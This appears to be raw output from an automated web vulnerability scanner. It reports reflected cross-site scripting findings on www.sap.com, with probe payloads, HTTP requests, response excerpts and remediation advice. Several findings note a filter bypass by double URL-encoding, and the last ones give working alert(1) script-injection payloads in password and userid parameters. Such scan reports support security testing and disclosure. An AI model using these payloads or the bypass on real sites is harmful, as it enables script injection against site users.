The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 897e8'%3b64a37e8a73 was submitted in the REST URL parameter 1. This input was echoed as 897e8';64a37e8a73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e3bb'%3b2cab67335f7 was submitted in the REST URL parameter 1. This input was echoed as 1e3bb';2cab67335f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37f00'%3b2a454ffd699 was submitted in the REST URL parameter 1. This input was echoed as 37f00';2a454ffd699 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2702'%3b754dccb0264 was submitted in the REST URL parameter 1. This input was echoed as e2702';754dccb0264 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c50'%3ba5ea46ddd56 was submitted in the REST URL parameter 1. This input was echoed as 70c50';a5ea46ddd56 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d57fe'%3bba8521573e5 was submitted in the REST URL parameter 1. This input was echoed as d57fe';ba8521573e5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e15c9'%3bf8dfd0a7e53 was submitted in the REST URL parameter 1. This input was echoed as e15c9';f8dfd0a7e53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c4fe'%3b078b4ba85dc was submitted in the REST URL parameter 1. This input was echoed as 3c4fe';078b4ba85dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34191'%3b4a807e85877 was submitted in the REST URL parameter 1. This input was echoed as 34191';4a807e85877 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde53'%3b04827bcf38e was submitted in the REST URL parameter 1. This input was echoed as cde53';04827bcf38e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81ac5'%3bfaef581bb5b was submitted in the REST URL parameter 1. This input was echoed as 81ac5';faef581bb5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /global81ac5'%3bfaef581bb5b/unified/css/StageHeaderMainFooter.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34346 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:04 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:04 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='global81ac5';faef581bb5b'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd56'%3b4de52bd1857 was submitted in the REST URL parameter 1. This input was echoed as 9cd56';4de52bd1857 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gwtservices9cd56'%3b4de52bd1857/httpBridge.epx HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9087 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:24 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:24 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservices9cd56';4de52bd1857'; var DOCUMENTNAME='Bridge';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b521'%3b890d1e3b86c was submitted in the REST URL parameter 1. This input was echoed as 9b521';890d1e3b86c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news-reader9b521'%3b890d1e3b86c/ HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34066 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:47 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:47 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='news-reader9b521';890d1e3b86c'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d4a0'%3b2ee006ae78a was submitted in the REST URL parameter 1. This input was echoed as 3d4a0';2ee006ae78a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /print3d4a0'%3b2ee006ae78a/global/ui/css/sapcom_countryselector.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34376 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:31 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:31 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='print3d4a0';2ee006ae78a'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82dcd%2522a%253d%2522b%25221a0efd74c47 was submitted in the REST URL parameter 1. This input was echoed as 82dcd"a="b"1a0efd74c47 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /sitemap.aspx82dcd%2522a%253d%2522b%25221a0efd74c47 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34397 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:26 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:26 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a17e'%3b6316216be92 was submitted in the REST URL parameter 1. This input was echoed as 4a17e';6316216be92 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.aspx4a17e'%3b6316216be92 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34290 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:30 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:30 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:04:30 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='sitemap.epx4a17e';6316216be92?error=403&404;http:'; var DOCUMENTNAME='Error';
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885bd%2522a%253d%2522b%25226ba1d0ca90e was submitted in the REST URL parameter 2. This input was echoed as 885bd"a="b"6ba1d0ca90e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /social/index.aspx885bd%2522a%253d%2522b%25226ba1d0ca90e HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34396 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:08 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:08 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf7b%2522a%253d%2522b%25222f512cd22da was submitted in the REST URL parameter 3. This input was echoed as 3cf7b"a="b"2f512cd22da in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /solutions/mobility-solutions/index.epx3cf7b%2522a%253d%2522b%25222f512cd22da HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 40813 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:03:43 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:03:43 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:03:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d498'%3b6186584efbc was submitted in the REST URL parameter 1. This input was echoed as 7d498';6186584efbc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /text7d498'%3b6186584efbc/global/ui/css/sapcom_countryselector.css HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 34369 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:30 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:30 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='text7d498';6186584efbc'; var DOCUMENTNAME='Error';
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe06%2522a%253d%2522b%2522cd34d5824cc was submitted in the REST URL parameter 3. This input was echoed as 8fe06"a="b"cd34d5824cc in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /usa/sme/index.epx8fe06%2522a%253d%2522b%2522cd34d5824cc HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 44413 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:50 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:50 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=smeipcheck=1; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c69b%2522a%253d%2522b%2522ffb1fd58d11 was submitted in the REST URL parameter 3. This input was echoed as 6c69b"a="b"ffb1fd58d11 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /usa/sme/index.epx%206c69b%2522a%253d%2522b%2522ffb1fd58d11 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 44407 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:04:56 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:04:56 GMT; path=/ Set-Cookie: SAP.SITE.COOKIE=smeipcheck=1; domain=.sap.com; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:04:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c15b'%3bc3401e30041 was submitted in the REST URL parameter 1. This input was echoed as 1c15b';c3401e30041 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Tue, 12-Nov-2013 19:10:40 GMT; path=/ Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Sat, 11-Feb-2012 19:10:40 GMT; path=/ Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; domain=.sap.com; expires=Tue, 13-Nov-2012 19:10:40 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sun, 13 Nov 2011 19:10:40 GMT Content-Length: 9370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='gwtservices1c15b';c3401e30041'; var DOCUMENTNAME='Bridge'; if(!ACTION) var ACTION; ACTION='03';
The value of the password request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2fdb'%3balert(1)//cf53a137865 was submitted in the password parameter. This input was echoed as f2fdb';alert(1)//cf53a137865 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the userid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1332'-alert(1)-'f09779bee1c was submitted in the userid parameter. This input was echoed unmodified in the application's response.
